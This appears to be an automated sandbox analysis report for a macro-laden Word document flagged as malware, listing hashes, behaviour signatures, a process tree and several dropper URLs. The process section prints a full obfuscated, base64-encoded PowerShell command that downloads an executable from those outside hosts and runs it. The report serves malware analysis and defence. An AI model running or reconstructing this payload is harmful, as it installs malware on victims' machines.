Overview

overview

10

Static

static

1

a93366e322...18.doc

windows7-x64

10

a93366e322...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    101s
  • max time network
    36s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    19/08/2024, 02:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a93366e3225998a55645b232a6c8baa9_JaffaCakes118.doc

  • Size

    143KB

  • MD5

    a93366e3225998a55645b232a6c8baa9

  • SHA1

    c5364b3afcbd7b2912c758e086d788c94f84fee4

  • SHA256

    3bff1d6887ad771d70ef433b5451e7b4aaa8f2ae98b84f5ddb349f40f4ece460

  • SHA512

    281042a592366ab3352ee87e73e4d1bc5a96ed3413b0aab69d08a30d600c6b1bbbed7aa8b83de5af51b9dc60f24290b587bc92cb11516a2570c3d8ae4c90283b

  • SSDEEP

    1536:IBpHfa3BkRD3bNqfNpu39IId5a6XP3Mg8afmqzMxXOYgnJnIJe4SGOMKaK4/D:0R1qf69xak3MgxmeY0nae4sMKT6D

Score
10/10
discovery

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://ibccglobal.com/thankyou2/ARA/
exe.dropper

http://work.digitalvichar.com/1mv7clu/o/
exe.dropper

http://13.229.25.57/7xdfb/jpA/
exe.dropper

http://binarystationary.com/cgi-bin/5rM/
exe.dropper

http://fmcav.com/images/ZQF/
exe.dropper

https://kodiakheating.com/ldnha/ybI/
exe.dropper

https://khvs.vrfantasy.gallery/igiodbck/eXq/

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a93366e3225998a55645b232a6c8baa9_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2068
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABTAGMAaAA0AHoAagAyAD0AKAAnAFoAXwAnACsAKAAnAHoAcgAnACsAJwBqADMAYQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAUgBQAFIATwBmAGkAbABlAFwASQBjADQARQBHAFYAdQBcAEMAXwB6AFMAawA1AFgAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIAZQBjAHQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGMAVQBgAFIAYABJAFQAeQBgAHAAUgBvAFQATwBDAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwArACcAMgAsACAAdAAnACkAKwAoACcAbAAnACsAJwBzADEAJwApACsAKAAnADEALAAgACcAKwAnAHQAbAAnACkAKwAnAHMAJwApADsAJABJAHgAOAB4AHAAbgBxACAAPQAgACgAJwBCAHAAJwArACcANgAnACsAKAAnAHAANAB4ACcAKwAnAHAAawAnACkAKQA7ACQAUAA4AHAAcAB5AGYAdAA9ACgAKAAnAFIAOAAnACsAJwBuAGcAJwApACsAJwB5ACcAKwAnADYAZAAnACkAOwAkAFcAZgBvAF8AbwBkAGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0ASQAnACsAJwBjADQAZQBnAHYAdQB7ADAAfQAnACsAJwBDAF8AegBzAGsANQB4AHsAJwArACcAMAB9ACcAKQAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAHgAOAB4AHAAbgBxACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABCAGYAaAA3AGQAdQBtAD0AKAAoACcARAAnACsAJwBxADcAJwApACsAKAAnADAAaAAnACsAJwBwAGMAJwApACkAOwAkAFUAcgB5AGIAMABkAGkAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQBUAC4AVwBFAEIAQwBMAGkAZQBuAHQAOwAkAFcAZQBwAGIAZABmAG8APQAoACgAJwBoACcAKwAnAHQAJwArACcAdABwADoALwAnACkAKwAoACcALwBpACcAKwAnAGIAJwApACsAKAAnAGMAYwBnAGwAbwBiACcAKwAnAGEAJwArACcAbAAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAvAHQAaABhAG4AawB5AG8AJwArACcAdQAyAC8AQQBSACcAKQArACcAQQAvACcAKwAoACcAKgAnACsAJwBoAHQAdAAnACsAJwBwADoALwAvACcAKQArACgAJwB3AG8AJwArACcAcgAnACkAKwAoACcAawAuAGQAJwArACcAaQBnACcAKQArACgAJwBpAHQAJwArACcAYQAnACsAJwBsAHYAaQBjAGgAYQByACcAKQArACgAJwAuAGMAJwArACcAbwBtAC8AMQBtAHYAJwApACsAKAAnADcAYwBsAHUAJwArACcALwAnACkAKwAoACcAbwAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwAnACsAJwAxADMAJwArACcALgAyACcAKwAnADIAJwApACsAKAAnADkAJwArACcALgAyACcAKwAnADUALgA1ADcALwA3AHgAZABmAGIALwBqACcAKwAnAHAAQQAvACcAKwAnACoAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAOgAvACcAKwAnAC8AYgBpACcAKwAnAG4AYQByAHkAcwB0AGEAdABpAG8AJwApACsAJwBuACcAKwAnAGEAJwArACcAcgB5ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAtACcAKwAnAGIAaQBuAC8ANQAnACkAKwAoACcAcgAnACsAJwBNAC8AKgBoAHQAJwApACsAJwB0ACcAKwAnAHAAJwArACgAJwA6AC8AJwArACcALwBmACcAKQArACgAJwBtAGMAJwArACcAYQAnACkAKwAoACcAdgAuAGMAbwAnACsAJwBtAC8AaQBtAGEAZwAnACsAJwBlAHMAJwArACcALwAnACsAJwBaAFEAJwArACcARgAvACoAaAB0ACcAKwAnAHQAcAAnACkAKwAoACcAcwA6ACcAKwAnAC8ALwBrAG8AZABpAGEAawBoAGUAJwArACcAYQAnACkAKwAoACcAdABpACcAKwAnAG4AZwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGwAJwArACcAZABuACcAKQArACgAJwBoAGEAJwArACcALwAnACkAKwAoACcAeQBiACcAKwAnAEkALwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcAAnACsAJwBzADoALwAvACcAKwAnAGsAaAB2ACcAKQArACgAJwBzAC4AdgByAGYAYQBuACcAKwAnAHQAYQBzAHkAJwArACcALgAnACsAJwBnAGEAbAAnACkAKwAnAGwAZQAnACsAJwByAHkAJwArACgAJwAvAGkAJwArACcAZwBpACcAKQArACgAJwBvAGQAJwArACcAYgBjAGsAJwApACsAKAAnAC8AZQBYAHEAJwArACcALwAnACkAKQAuACIAcwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABYAGgAZABuAG0AbQBsAD0AKAAoACcARQByAHUAJwArACcANgB4ACcAKQArACcAbgAnACsAJwBwACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFgAcwAwAGgAcwB2ADIAIABpAG4AIAAkAFcAZQBwAGIAZABmAG8AKQB7AHQAcgB5AHsAJABVAHIAeQBiADAAZABpAC4AIgBEAG8AYABXAGAATgBsAE8AYQBEAGAARgBpAGwARQAiACgAJABYAHMAMABoAHMAdgAyACwAIAAkAFcAZgBvAF8AbwBkAGYAKQA7ACQAVQBlADIAcwBoAG8AcwA9ACgAKAAnAE8AcQBqACcAKwAnAGkAJwApACsAKAAnAGsAJwArACcAdQAzACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFcAZgBvAF8AbwBkAGYAKQAuACIATABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANQA1ADcAMQApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACgAJABXAGYAbwBfAG8AZABmACkAOwAkAFMAagBxADIAMgBfADEAPQAoACcASgAxACcAKwAoACcAdwBfAHMAJwArACcAbQAzACcAKQApADsAYgByAGUAYQBrADsAJABJAGgAZAB5AHYAcQB0AD0AKAAoACcAQgA0ACcAKwAnADgAJwApACsAKAAnAGMAJwArACcAZAB1AHgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAYQA5AGUAMAA0AGIAPQAoACcAQQB5ACcAKwAoACcANgB6ACcAKwAnADgAJwApACsAJwBiAGMAJwApAA==
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2576

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      08b5cdbd27135bbc1f193468322d22a8

      SHA1

      7030b8383cfab3692977dbfd54fd60bcab909cb3

      SHA256

      05dc627b84df66f2c58f4bec5e27ad511c57d368357a610c4174a00fe4eb9a79

      SHA512

      93929002327c24706644f1e1151bda8e8bfc22eadc2627552e7a89a760797029683a24f03bd97de50c7d8188a179d26e90d9065d58a7760806d45c3ae308c8a6

      Download Submit

    • memory/1656-37-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-48-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-6-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-7-0x0000000005F70000-0x0000000006070000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-29-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-28-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-14-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-81-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1656-0-0x000000002F091000-0x000000002F092000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1656-47-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-2-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1656-39-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-46-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-80-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1656-56-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1656-57-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-58-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-59-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-60-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-61-0x0000000005830000-0x0000000005930000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1656-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2576-55-0x0000000001D10000-0x0000000001D18000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2576-54-0x000000001B2B0000-0x000000001B592000-memory.dmp

      Filesize

      2.9MB

      Download